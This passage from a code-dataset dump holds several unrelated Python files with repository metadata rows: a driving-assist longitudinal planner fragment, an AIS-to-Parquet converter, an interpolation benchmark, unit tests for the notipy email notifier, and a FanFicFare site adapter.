self.target_speed_map_block = True
self.target_speed_map_counter1 = 80
os.system("logcat -c &")
else:
self.target_speed_map = 0
self.target_speed_map_dist = 0
self.target_speed_map_block = False
elif mapspeed is None and mapspeeddist is None and self.target_speed_map_counter2 < 2:
self.target_speed_map_counter2 += 1
self.target_speed_map_counter = 51
self.target_speed_map = 0
self.target_speed_map_dist = 0
self.target_speed_map_counter_check = True
self.target_speed_map_block = False
self.target_speed_map_sign = False
else:
self.target_speed_map_counter = 49
self.target_speed_map_counter2 = 0
self.target_speed_map = 0
self.target_speed_map_dist = 0
self.target_speed_map_counter_check = False
self.target_speed_map_block = False
self.target_speed_map_sign = False
# Calculate speed for normal cruise control
if enabled and not self.first_loop and not sm['carState'].brakePressed and not sm['carState'].gasPressed:
accel_limits = [float(x) for x in calc_cruise_accel_limits(v_ego, following)]
jerk_limits = [min(-0.1, accel_limits[0]), max(0.1, accel_limits[1])] # TODO: make a separate lookup for jerk tuning
accel_limits_turns = limit_accel_in_turns(v_ego, sm['carState'].steeringAngleDeg, accel_limits, self.CP)
if force_slow_decel and False: # awareness decel is disabled for now
# if required so, force a smooth deceleration
accel_limits_turns[1] = min(accel_limits_turns[1], AWARENESS_DECEL)
accel_limits_turns[0] = min(accel_limits_turns[0], accel_limits_turns[1])
self.v_cruise, self.a_cruise = speed_smoother(self.v_acc_start, self.a_acc_start,
v_cruise_setpoint,
accel_limits_turns[1], accel_limits_turns[0],
jerk_limits[1], jerk_limits[0],
LON_MPC_STEP)
# cruise speed can't be negative even is user is distracted
self.v_cruise = max(self.v_cruise, 0.)
else:
starting = long_control_state == LongCtrlState.starting
a_ego = min(sm['carState'].aEgo, 0.0)
reset_speed = self.CP.minSpeedCan if starting else v_ego
reset_accel = self.CP.startAccel if starting else a_ego
self.v_acc = reset_speed
self.a_acc = reset_accel
self.v_acc_start = reset_speed
self.a_acc_start = reset_accel
self.v_cruise = reset_speed
self.a_cruise = reset_accel
self.mpc1.set_cur_state(self.v_acc_start, self.a_acc_start)
self.mpc2.set_cur_state(self.v_acc_start, self.a_acc_start)
self.mpc_model.set_cur_state(self.v_acc_start, self.a_acc_start)
self.mpc1.update(sm['carState'], lead_1)
self.mpc2.update(sm['carState'], lead_2)
distances, speeds, accelerations = self.model_mpc_helper.convert_data(sm)
self.mpc_model.update(sm['carState'].vEgo, sm['carState'].aEgo,
distances,
speeds,
accelerations)
self.choose_solution(v_cruise_setpoint, enabled, self.params.get_bool("ModelLongEnabled"))
# determine fcw
if self.mpc1.new_lead:
self.fcw_checker.reset_lead(cur_time)
blinkers = sm['carState'].leftBlinker or sm['carState'].rightBlinker
self.fcw = self.fcw_checker.update(self.mpc1.mpc_solution, cur_time,
sm['controlsState'].active,
v_ego, sm['carState'].aEgo,
lead_1.dRel, lead_1.vLead, lead_1.aLeadK,
lead_1.yRel, lead_1.vLat,
lead_1.fcw, blinkers) and not sm['carState'].brakePressed
if self.fcw:
cloudlog.info("FCW triggered %s", self.fcw_checker.counters)
# Interpolate 0.05 seconds and save as starting point for next iteration
a_acc_sol = self.a_acc_start + (CP.radarTimeStep / LON_MPC_STEP) * (self.a_acc - self.a_acc_start)
v_acc_sol = self.v_acc_start + CP.radarTimeStep * (a_acc_sol + self.a_acc_start) / 2.0
self.v_acc_next = v_acc_sol
self.a_acc_next = a_acc_sol
self.first_loop = False
def publish(self, sm, pm):
self.mpc1.publish(pm)
self.mpc2.publish(pm)
plan_send = messaging.new_message('longitudinalPlan')
plan_send.valid = sm.all_alive_and_valid(service_list=['carState', 'controlsState', 'radarState'])
longitudinalPlan = plan_send.longitudinalPlan
longitudinalPlan.mdMonoTime = sm.logMonoTime['modelV2']
longitudinalPlan.radarStateMonoTime = sm.logMonoTime['radarState']
longitudinalPlan.vCruise = float(self.v_cruise)
longitudinalPlan.aCruise = float(self.a_cruise)
longitudinalPlan.vStart = float(self.v_acc_start)
longitudinalPlan.aStart = float(self.a_acc_start)
longitudinalPlan.vTarget = float(self.v_acc)
longitudinalPlan.aTarget = float(self.a_acc)
longitudinalPlan.vTargetFuture = float(self.v_acc_future)
longitudinalPlan.hasLead = self.mpc1.prev_lead_status
longitudinalPlan.longitudinalPlanSource = self.longitudinalPlanSource
longitudinalPlan.fcw = self.fcw
longitudinalPlan.processingDelay = (plan_send.logMonoTime / 1e9) - sm.rcv_time['radarState']
# Send radarstate(dRel, vRel, yRel)
lead_1 = sm['radarState'].leadOne
lead_2 = sm['radarState'].leadTwo
longitudinalPlan.dRel1 = float(lead_1.dRel)
longitudinalPlan.yRel1 = float(lead_1.yRel)
longitudinalPlan.vRel1 = float(lead_1.vRel)
longitudinalPlan.dRel2 = float(lead_2.dRel)
longitudinalPlan.yRel2 = float(lead_2.yRel)
longitudinalPlan.vRel2 = float(lead_2.vRel)
longitudinalPlan.status2 = bool(lead_2.status)
cam_distance_calc = 0
cam_distance_calc = interp(self.vego*CV.MS_TO_KPH, [30,60,100,160], [3.75,5.5,6,7])
consider_speed = interp((self.vego*CV.MS_TO_KPH - self.target_speed_map), [10, 30], [1, 1.3])
if self.target_speed_map > 29 and self.target_speed_map_dist < cam_distance_calc*consider_speed*self.vego*CV.MS_TO_KPH:
longitudinalPlan.targetSpeedCamera = float(self.target_speed_map)
longitudinalPlan.targetSpeedCameraDist = float(self.target_speed_map_dist)
self.target_speed_map_sign = True
elif self.target_speed_map > 29 and self.target_speed_map_dist >= cam_distance_calc*consider_speed*self.vego*CV.MS_TO_KPH and self.target_speed_map_block:
longitudinalPlan.targetSpeedCamera = float(self.target_speed_map)
longitudinalPlan.targetSpeedCameraDist = float(self.target_speed_map_dist)
self.target_speed_map_sign = True
elif self.target_speed_map > 29 and self.target_speed_map_sign:
longitudinalPlan.targetSpeedCamera = float(self.target_speed_map)
longitudinalPlan.targetSpeedCameraDist = float(self.target_speed_map_dist)
else:
longitudinalPlan.targetSpeedCamera = 0
longitudinalPlan.targetSpeedCameraDist = 0
pm.send('longitudinalPlan', plan_send)
| 43.480447 | 177 | 0.694398 |
69d44e9ba33a7bea0e21c95a8206937d081cf54d | 6,905 | py | Python | archivetoparquet.py | ScottSyms/AISArchive | eee55b97d6010679c30bb00601827ba04a91faf5 | [
"BSD-2-Clause"
] | null | null | null | archivetoparquet.py | ScottSyms/AISArchive | eee55b97d6010679c30bb00601827ba04a91faf5 | [
"BSD-2-Clause"
] | null | null | null | archivetoparquet.py | ScottSyms/AISArchive | eee55b97d6010679c30bb00601827ba04a91faf5 | [
"BSD-2-Clause"
] | null | null | null | import pandas as pd
from bitstring import BitString
import pyarrow
import pyarrow.parquet as pq
import numpy as np
import sys
# Constants
lookupstring = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ !\"#$%&\\()*+,-./0123456789:;<=>?"
def convertPayload(string):
"""
AIS payloads are encoded in six bit ascii. This converts the payload into
ASCII for further processing.
"""
binword = ''
for piece in str(string):
# Subtract 48 from the ascii value.
# If the value is greater than 40, subtract 8
ascii_piece = ord(piece) - 48
if ascii_piece > 40:
ascii_piece = ascii_piece - 8
# to convert the string to binary.
for x in [32, 16, 8, 4, 2, 1]:
if ascii_piece - x >= 0:
ascii_piece = ascii_piece - x
binword = binword + '1'
else:
binword = binword + '0'
return binword
def getMessageType(row):
return BitString(bin=row['binpayload'])[0:6].uint
def getMMSI(row):
# if row['messagetype'] in [1, 2, 3, 18, 24]:
return str(BitString(bin=row['binpayload'])[8:38].uint).zfill(9)
# else:
# return None
def getLongitude(row):
payload = BitString(bin=row['binpayload'])
payload = payload + \
BitString('0x000000000000000000000000000000000000000000000000000')
if row['messagetype'] in [1, 2, 3, 9]:
longitude = float(payload[61:89].int)/600000
elif row['messagetype'] in [4]:
longitude = float(payload[79:107].int) / 600000
elif row['messagetype'] in [18, 19]:
longitude = float(payload[57:85].int) / 600000
elif row['messagetype'] in [21]:
longitude = float(payload[164:192].int) / 600000
elif row['messagetype'] in [27]:
longitude = float(payload[44:62].int) / 600000
else:
longitude = None
return longitude
def getLatitude(row):
payload = BitString(bin=row['binpayload'])
payload = payload + \
BitString('0x100000000000000000000000000000000000000000000000000')
if row['messagetype'] in [1, 2, 3, 9]:
latitude = float(payload[89:116].int)/600000
elif row['messagetype'] in [4]:
latitude = float(payload[107:134].int) / 600000
elif row['messagetype'] in [18, 19]:
latitude = float(payload[85:112].int) / 600000
elif row['messagetype'] in [21]:
latitude = float(payload[192:219].int) / 600000
elif row['messagetype'] in [27]:
latitude = float(payload[62:79].int) / 600000
else:
latitude = None
return latitude
def returnAscii(x):
ascii_piece = x + 48
if ascii_piece > 31:
ascii_piece = ascii_piece + 8
return chr(ascii_piece)
def clean(data):
"""
Make sure the text is allowable
"""
text = ''
for i in data.upper():
if i in lookupstring:
text = text + i
return text
def converttoString(payload):
'''
Convert from sixbit ascii to text
'''
lookupstring = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ !\"#$%&\\()*+,-./0123456789:;<=>?"
length = len(payload)
payload = BitString(
bin=payload) + BitString('0x00000000000000000000000000000000000000000000000000000')
word = ''
while True:
try:
snip = payload.read("uint:6")
except:
return clean(word.replace('@', '').strip())
if snip == '' or payload.pos == length:
return clean(word.replace('@', '').strip())
else:
word = word + lookupstring[snip]
def getDestination(payload):
return converttoString(payload[302:422])
def getShipname(payload):
return converttoString(payload[112:232])
def getCallsign(payload):
return converttoString(payload[70:112])
print("\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("Reading the data from ", sys.argv[2])
df = pd.read_csv(sys.argv[2], delimiter='!',
header=0, names=['prefix', 'suffix'])
print("Extracting the payload")
df['payload'] = df.suffix.str.extract(
r'AIVDM,\w*,\w*,\w*,\w*,([A-Za-z0-9:;<=>=?@`]+)')
print("Converting the payload to binary")
df['binpayload'] = df.payload.apply(convertPayload)
print("Getting the message type")
df['messagetype'] = df.apply(lambda x: getMessageType(x), axis=1)
print("Getting the MMSI")
df['mmsi'] = df.apply(lambda x: getMMSI(x), axis=1)
print("Getting the longitude and latitude")
df['longitude'] = df.apply(lambda x: getLongitude(x), axis=1)
df['latitude'] = df.apply(lambda x: getLatitude(x), axis=1)
print("extracting the received and reported time")
try:
df['received_time'] = df.prefix.str.extract(r'(^[\d]*)')
df['received_time'] = df.received_time.apply(
lambda x: pd.Timestamp(int(x), unit='s', tz="UTC"))
except:
pass
df['report_time'] = df.prefix.str.extract(r'c:(\d+)')
df['report_time'] = df.report_time.apply(lambda x: x if pd.isna(
x) else pd.Timestamp(int(x), unit='s', tz="UTC"))
value = pd.Timestamp(0, unit='s', tz='UTC')
df.report_time.fillna(value, inplace=True)
print("Extracting sentence, group, fragment data and padding value")
df['source'] = df.prefix.str.extract(r's:(\w*)')
df['group'] = df.prefix.str.extract(r'g:([A-Za-z0-9-]+)')
df['fragments'] = df.suffix.str.extract(r'AIVDM,(\w*)')
df['fragment'] = df.suffix.str.extract(r'AIVDM,\w*,(\w*)')
df['fragmentid'] = df.suffix.str.extract(r'AIVDM,\w*,\w*,(\w*)')
df['frequency'] = df.suffix.str.extract(r'AIVDM,\w*,\w*,\w*,(\w*)')
df['padding'] = df.suffix.str.extract(r',(\d+)\*')
print("Appending second fragment")
df['merge'] = df['mmsi'] + df['group']
seconds = df.query("fragments == '2' and fragment=='2'")[
['merge', 'binpayload']]
df = df.merge(seconds, on='merge', how='outer')
df['binpayload'] = np.where(
pd.isna(df.binpayload_y), df.binpayload_x, df.binpayload_x + df.binpayload_y)
print("Removing second fragment")
df.drop(df[df.fragment == '2'].index, inplace=True)
print("Adding destination")
df['destination'] = df.query("messagetype == '5'").binpayload.apply(
lambda x: getDestination(x))
print("Adding callsign")
df['callsign'] = df.query("messagetype == '5'").binpayload.apply(
lambda x: getCallsign(x))
print("Adding adding ship name")
df['shipname'] = df.query("messagetype == '5'").binpayload.apply(
lambda x: getShipname(x))
print('Create date values to partition on')
df['year'] = df.report_time.apply(lambda x: int(x.year))
df['month'] = df.report_time.apply(lambda x: int(x.month))
df['day'] = df.report_time.apply(lambda x: int(x.day))
df['hour'] = df.report_time.apply(lambda x: int(x.hour))
print("Drop columns and save file")
df.drop(columns=['prefix', 'suffix', 'payload',
'binpayload_x', 'binpayload_y'], inplace=True)
table = pyarrow.Table.from_pandas(df)
pq.write_to_dataset(table, sys.argv[1], partition_cols=[
'year', 'month', 'day', 'hour'], compression='snappy')
| 31.674312 | 91 | 0.623606 |
5f5bb022bda5a9f4a8732940f0eeae12e30dcdab | 1,071 | py | Python | examples/compare_1d.py | ndrwpvlv/sinterp | 5c4606e9b82bf703650d320c74005fa16c98cb23 | [
"MIT"
] | null | null | null | examples/compare_1d.py | ndrwpvlv/sinterp | 5c4606e9b82bf703650d320c74005fa16c98cb23 | [
"MIT"
] | null | null | null | examples/compare_1d.py | ndrwpvlv/sinterp | 5c4606e9b82bf703650d320c74005fa16c98cb23 | [
"MIT"
] | null | null | null | import random
import time
from numpy import interp
from sinterp import interp1d
times = [] # list with time of calculation
ratios = [] # ratio of calc with interp to interp1d
deltas = [] # summary delta of difference results by iteration
size = []
for kk in range(2, 5):
x1 = 0
x2 = int(10 ** kk)
size.append(x2)
xp = [float(_) for _ in range(x1, x2 + 1)]
yp = [_ ** 3.0 for _ in xp]
x = [random.uniform(float(x1), float(x2)) for _ in range(10000)]
start_time = time.time()
v_1 = [interp(_, xp, yp) for _ in x]
time_1 = time.time() - start_time
start_time = time.time()
v_2 = [interp1d(_, xp, yp) for _ in x]
time_2 = time.time() - start_time
times.append([time_1, time_2])
ratios.append(time_1 / time_2)
deltas.append(sum(_[1] - _[0] for _ in zip(v_1, v_2)))
# Print benchmark ratios
print('--- Benchmark results ---')
print('List size : Ratio')
for r, v in zip(size, ratios):
print(' %i : %f' % (r, v))
print('Check convergence. Difference between interp and interp1d = %f' % max(deltas))
| 26.121951 | 85 | 0.623716 |
02b1af15aa88e85c0dbc3efd257130f9c8c8bb47 | 12,680 | py | Python | test_notipy.py | nbryans/notipy | f925dcb97d0d4e5124e1f3d4d3a7ed3a0aa47bc7 | [
"MIT"
] | null | null | null | test_notipy.py | nbryans/notipy | f925dcb97d0d4e5124e1f3d4d3a7ed3a0aa47bc7 | [
"MIT"
] | null | null | null | test_notipy.py | nbryans/notipy | f925dcb97d0d4e5124e1f3d4d3a7ed3a0aa47bc7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import notipymail.notipy as notipy
import unittest
import time
import os
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
class TestUpdating(unittest.TestCase):
toAddr = "to@destination.com"
toAddr2 = "to2@destination2.com"
msg = "Test Message "
sub = "test_subject"
fromAddr = "from@here.com"
fromPwd = "pwd"
emailSer = "smtp.dummy.com"
emailPort = 25
alternateSendDetailsPath = "dummy.dat"
@classmethod
def setUpClass(self):
import testutil
self.alternateSendDetailsPath = os.getcwd()+ "\\" + self.alternateSendDetailsPath
self.required_keywords = notipy.required_keywords
@classmethod
def tearDownClass(self):
import smtplib
# Delete dummy sendDetails file
def tearDown(self):
time.sleep(0.03)
# I've found that a small time delay between tests helps
# prevent a sporadic test error where the OS can't open the
# dummy.dat file in Python3
def checkSendDetailsFile(self, toAddr, fromAddr, emailSer, emailPort, filePath=""):
if filePath == "":
filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
assert os.path.exists(filePath)
with open(filePath) as fin:
for line in fin:
x = line.split(':')
self.assertTrue(len(x) == 2)
x[0] = x[0].strip()
self.assertTrue(x[0] in self.required_keywords)
shouldEqual = ""
if x[0] == 'email':
shouldEqual = self.fromAddr
elif x[0] == 'password':
shouldEqual = self.fromPwd
elif x[0] == 'server':
shouldEqual = self.emailSer
elif x[0] == 'port':
shouldEqual = str(self.emailPort)
self.assertTrue(x[1].strip() == shouldEqual)
def checkReadSendDetailsDict(self, readDict):
for i in self.required_keywords:
self.assertTrue(i in readDict.keys())
if i == 'email':
shouldEqual = self.fromAddr
elif i == 'password':
shouldEqual = self.fromPwd
elif i == 'server':
shouldEqual = self.emailSer
elif i == 'port':
shouldEqual = str(self.emailPort)
self.assertTrue(readDict[i] == shouldEqual)
def checkSendDetailsClear(self, filename):
# Make sure we get MissingValueExceptions
self.assertRaises(notipy.MissingValueException, notipy._readSendDetails)
# Also, manually read the file to make sure NO values in it
with open(filename, 'r') as fin:
for line in fin:
x = line.rstrip().split(':')
self.assertTrue(len(x[1]) == 0)
def checkLogEntry(self, entry, missValExcp=False, missConfigExcp=False, smtpExcp=False):
# This will be used to check the contents in the log and make sure they're correct
if missValExcp or missConfigExcp or smtpExcp:
self.assertTrue("ERROR" in entry)
if missValExcp:
self.assertTrue("file must contain a key and value" in entry)
elif missConfigExcp:
self.assertTrue("You must provide a" in entry)
elif smtpExcp:
self.assertTrue("SMTPException caught" in entry)
def checkLogMultiLine(self, entry, numLineQueried, numLineActual):
numNewLine = entry.count('\n')
self.assertTrue(numNewLine <= 2)
def test_updateSendDetails(self):
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
self.checkSendDetailsFile(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
def test_updateSendDetailsNonDefaultFile(self):
notipy.detailsFileName = self.alternateSendDetailsPath
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
self.checkSendDetailsFile(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort, filePath=notipy.detailsFileName)
notipy.detailsFileName = "" # Cleanup
def test_readSendDetails(self):
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
x = notipy._readSendDetails()
self.checkReadSendDetailsDict(x)
def test_readSendDetailsNonDefaultFile(self):
notipy.detailsFileName = self.alternateSendDetailsPath
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
x = notipy._readSendDetails()
self.checkReadSendDetailsDict(x)
notipy.detailsFileName = "" # Cleanup
def test_readIncompleteSendDetails(self):
filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
# Checking for exception with empty port value
with open(filePath, 'w') as fin:
fin.write('email:'+self.fromAddr+'\n')
fin.write('password:'+self.fromPwd+'\n')
fin.write('server:'+self.emailSer+'\n')
fin.write('port:\n')
self.assertRaises(notipy.MissingValueException, notipy._readSendDetails)
# Checking for exception with missing pwd
with open(filePath, 'w') as fin:
fin.write('email:'+self.fromAddr+'\n')
fin.write('server:'+self.emailSer+'\n')
fin.write('port:'+str(self.emailPort)+'\n')
self.assertRaises(notipy.MissingValueException, notipy._readSendDetails)
#Cleanup
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
def test_readNoSendDetails(self):
filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
os.remove(filePath)
self.assertRaises(notipy.MissingConfigFileException, notipy._readSendDetails)
#Cleanup
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
def test_clearSendDetails(self):
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
notipy.clearSendDetails()
filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
self.checkSendDetailsClear(filePath)
#Cleanup
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
def test_clearSendDetailsNonDefaultFile(self):
notipy.detailsFileName = self.alternateSendDetailsPath
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
notipy.clearSendDetails()
self.checkSendDetailsClear(notipy.detailsFileName)
notipy.detailsFileName = "" # Cleanup
def test_logFileMissingValueException(self):
# Ensure the log file correctly logs a MissingValueException
# Generate the Exception
filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
# Checking for exception with missing pwd
with open(filePath, 'w') as fin:
fin.write('email:'+self.fromAddr+'\n')
fin.write('server:'+self.emailSer+'\n')
fin.write('port:'+str(self.emailPort)+'\n')
notipy.sendMail(self.toAddr, self.msg)
out = StringIO()
notipy.queryLog(1, out=out)
output=out.getvalue().strip()
self.checkLogEntry(output, missValExcp=True)
notipy.clearLog() # Cleanup
def test_logFileMissingConfigFileException(self):
# Ensure the log file correctly logs a MissingConfigFileException
filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
os.remove(filePath)
notipy.sendMail(self.toAddr, self.msg)
out = StringIO()
notipy.queryLog(1, out=out)
output=out.getvalue().strip()
self.checkLogEntry(output, missConfigExcp=True)
notipy.clearLog() # Cleanup
def test_logFileSMTPException(self):
# Make sure the log file correctly logs a SMTPException when it occurs
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
notipy.sendMail(self.toAddr, 'raise smtpexception')
out = StringIO()
notipy.queryLog(1, out=out)
output=out.getvalue().strip()
self.checkLogEntry(output, smtpExcp=True)
notipy.clearLog()
def test_queryLogExcess(self):
# Make sure queryLog behaves correctly when we query more items from
# the log than there are
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
notipy.clearLog()
notipy.sendMail(self.toAddr, self.msg)
notipy.sendMail(self.toAddr, self.msg)
out = StringIO()
notipy.queryLog(3, out=out)
output=out.getvalue().strip()
self.checkLogMultiLine(output, 3, 2)
notipy.clearLog()
def test_clearLog(self):
# Make sure the log is cleared correctly
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
notipy.sendMail(self.toAddr, self.msg)
notipy.sendMail(self.toAddr, self.msg)
notipy.clearLog()
#Verify (manually) here that the log is cleared
filePath = notipy.pkg.resource_filename('notipymail','data/notipy.log')
self.assertTrue(os.stat(filePath).st_size == 0)
def test_clearLogNonDefaultFile(self):
# Make sure the log is cleared correctly when its in non-default location
# Right now, to test this I need to change file name in notipy.py
# and reload module. Change program behaviour to make this easier
# to test
pass
class TestSendingMail(unittest.TestCase):
toAddr = "to@destination.com"
toAddr2 = "to2@destination2.com"
msg = "Test Message "
sub = "test_subject"
fromAddr = "from@here.com"
fromPwd = "pwd"
emailSer = "smtp.dummy.com"
emailPort = 25
@classmethod
def setUpClass(self):
import testutil
notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
@classmethod
def tearDownClass(self):
import smtplib # Clear Monkey Patch on smtplib
notipy.clearSendDetails()
def checkLogEntry(self, entry, subject=False, multRecipients=False):
# This will be used to check the contents in the log and make sure they're correct
self.assertTrue("Successfully sent mail to" in entry)
self.assertTrue("INFO" in entry)
self.assertTrue(self.toAddr in entry)
if multRecipients:
self.assertTrue(self.toAddr2 in entry)
def test_sendMail(self):
msg = self.msg + "test_sendMail"
notipy.sendMail(self.toAddr, msg)
out = StringIO()
notipy.queryLog(1, out=out)
output = out.getvalue().strip()
self.checkLogEntry(output)
notipy.clearLog()
def test_sendMailWithSubj(self):
msg = self.msg + "test_sendMailWithSubj"
notipy.sendMail(self.toAddr, msg, self.sub)
out = StringIO()
notipy.queryLog(1, out=out)
output = out.getvalue().strip()
self.checkLogEntry(output, subject=True)
notipy.clearLog()
def test_sendMailWithMultipleRecipients(self):
msg = self.msg + "test_sendMailWithMultipleRecipients"
notipy.sendMail(self.toAddr+","+self.toAddr2, msg)
out = StringIO()
notipy.queryLog(1, out=out)
output=out.getvalue().strip()
self.checkLogEntry(output, multRecipients=True)
notipy.clearLog()
# Unsure how to test Async function at this time since
# Monkey patch on the smtplib.SMTP does not carry over to
# spawned processes
# def test_sendMailAsync(self):
# msg = self.msg + "test_sendMailAsync"
# notipy.sendMailAsync(self.toAddr, msg)
# time.sleep(5)
# out = StringIO()
# notipy.queryLog(1, out=out)
# output = out.getvalue().strip()
# print(output)
# self.checkLogEntry(output)
# notipy.clearLog()
# def test_sendMailAsyncWithSubj(self):
# msg = self.msg + "test_sendMailAsyncWithSubj"
# notipy.sendMailAsync(self.toAddr, msg, self.sub)
# time.sleep(5)
# out = StringIO()
# notipy.queryLog(1, out=out)
# output = out.getvalue().strip()
# print(output)
# self.checkLogEntry(output, subject=True)
# notipy.clearLog()
if __name__ == '__main__':
unittest.main() | 37.514793 | 126 | 0.644006 |
f098ba3dedf95f7c8d57cacbe68543b9f09b8463 | 2,524 | py | Python | scripts/post.py | sebbASF/asfmm | ee93bf6fa617f74ba40bf4b2d3b6af70e873edf9 | [
"Apache-2.0"
] | null | null | null | scripts/post.py | sebbASF/asfmm | ee93bf6fa617f74ba40bf4b2d3b6af70e873edf9 | [
"Apache-2.0"
] | null | null | null | scripts/post.py | sebbASF/asfmm | ee93bf6fa617f74ba40bf4b2d3b6af70e873edf9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ahapi
import typing
import time
"""Post end point for MM"""
async def process(state: typing.Any, request, formdata: dict) -> typing.Any:
cookie = state.cookies.get(request) # Fetches a valid session or None if not found
if not cookie:
return {"success": False, "message": "Oops, something went terribly wrong here!"}
sender = cookie.state["credentials"]["login"]
realname = cookie.state["credentials"]["name"]
message = formdata.get("message")
roomname = formdata.get("room")
if sender in state.blocked or sender in state.banned:
return {
"success": False,
"message": "You appear to be blocked from sending messages",
}
for room in state.rooms:
if room.name == roomname:
throttle_max = state.config.get("message_rate_limit", 5)
if len(room.flood_control) >= throttle_max and room.flood_control[-throttle_max] >= time.time()-1:
return {
"success": False,
"message": "The chat is experiencing a large influx of messages and have been throttled. Please try again.",
}
room.add_message(sender, realname, message)
# Add the timestamp of this message to flood control list
room.flood_control.append(time.time())
if len(room.flood_control) > 50:
room.flood_control.pop(0)
return {
"success": True,
"message": "Message sent!",
}
return {
"success": False,
"message": "Could not find room!",
}
def register(state: typing.Any):
return ahapi.endpoint(process)
| 39.4375 | 128 | 0.649762 |
d9d3133cc49bc0484d36245dd1584855b06f7e74 | 8,135 | py | Python | fanficfare/adapters/adapter_spikeluvercom.py | davidferguson/FanFicUpload | dcc3010b9c35c6d0e479cfc2aa07d951d280d9b2 | [
"Apache-2.0"
] | 1 | 2019-06-13T11:20:33.000Z | 2019-06-13T11:20:33.000Z | fanficfare/adapters/adapter_spikeluvercom.py | davidferguson/FanFicUpload | dcc3010b9c35c6d0e479cfc2aa07d951d280d9b2 | [
"Apache-2.0"
] | null | null | null | fanficfare/adapters/adapter_spikeluvercom.py | davidferguson/FanFicUpload | dcc3010b9c35c6d0e479cfc2aa07d951d280d9b2 | [
"Apache-2.0"
] | null | null | null | # Software: eFiction
import re
import urllib2
import urlparse
from bs4.element import Tag
from ..htmlcleanup import stripHTML
from base_adapter import BaseSiteAdapter, makeDate
from .. import exceptions
def getClass():
return SpikeluverComAdapter
# yields Tag _and_ NavigableString siblings from the given tag. The
# BeautifulSoup findNextSiblings() method for some reasons only returns either
# NavigableStrings _or_ Tag objects, not both.
def _yield_next_siblings(tag):
sibling = tag.nextSibling
while sibling:
yield sibling
sibling = sibling.nextSibling
class SpikeluverComAdapter(BaseSiteAdapter):
SITE_ABBREVIATION = 'slc'
SITE_DOMAIN = 'spikeluver.com'
BASE_URL = 'http://' + SITE_DOMAIN + '/SpuffyRealm/'
LOGIN_URL = BASE_URL + 'user.php?action=login'
VIEW_STORY_URL_TEMPLATE = BASE_URL + 'viewstory.php?sid=%d'
METADATA_URL_SUFFIX = '&index=1'
AGE_CONSENT_URL_SUFFIX = '&ageconsent=ok&warning=5'
DATETIME_FORMAT = '%m/%d/%Y'
STORY_DOES_NOT_EXIST_ERROR_TEXT = 'That story does not exist on this archive. You may search for it or return to the home page.'
def __init__(self, config, url):
BaseSiteAdapter.__init__(self, config, url)
query_data = urlparse.parse_qs(self.parsedUrl.query)
story_id = query_data['sid'][0]
self.story.setMetadata('storyId', story_id)
self._setURL(self.VIEW_STORY_URL_TEMPLATE % int(story_id))
self.story.setMetadata('siteabbrev', self.SITE_ABBREVIATION)
def _customized_fetch_url(self, url, exception=None, parameters=None):
if exception:
try:
data = self._fetchUrl(url, parameters)
except urllib2.HTTPError:
raise exception(self.url)
# Just let self._fetchUrl throw the exception, don't catch and
# customize it.
else:
data = self._fetchUrl(url, parameters)
return self.make_soup(data)
@staticmethod
def getSiteDomain():
return SpikeluverComAdapter.SITE_DOMAIN
@classmethod
def getSiteExampleURLs(cls):
return cls.VIEW_STORY_URL_TEMPLATE % 1234
def getSiteURLPattern(self):
return re.escape(self.VIEW_STORY_URL_TEMPLATE[:-2]) + r'\d+$'
def extractChapterUrlsAndMetadata(self):
soup = self._customized_fetch_url(self.url + self.METADATA_URL_SUFFIX)
errortext_div = soup.find('div', {'class': 'errortext'})
if errortext_div:
error_text = ''.join(errortext_div(text=True)).strip()
if error_text == self.STORY_DOES_NOT_EXIST_ERROR_TEXT:
raise exceptions.StoryDoesNotExist(self.url)
# No additional login is required, just check for adult
pagetitle_div = soup.find('div', id='pagetitle')
if pagetitle_div.a['href'].startswith('javascript:'):
if not(self.is_adult or self.getConfig('is_adult')):
raise exceptions.AdultCheckRequired(self.url)
url = ''.join([self.url, self.METADATA_URL_SUFFIX, self.AGE_CONSENT_URL_SUFFIX])
soup = self._customized_fetch_url(url)
pagetitle_div = soup.find('div', id='pagetitle')
self.story.setMetadata('title', stripHTML(pagetitle_div.a))
author_anchor = pagetitle_div.a.findNextSibling('a')
url = urlparse.urljoin(self.BASE_URL, author_anchor['href'])
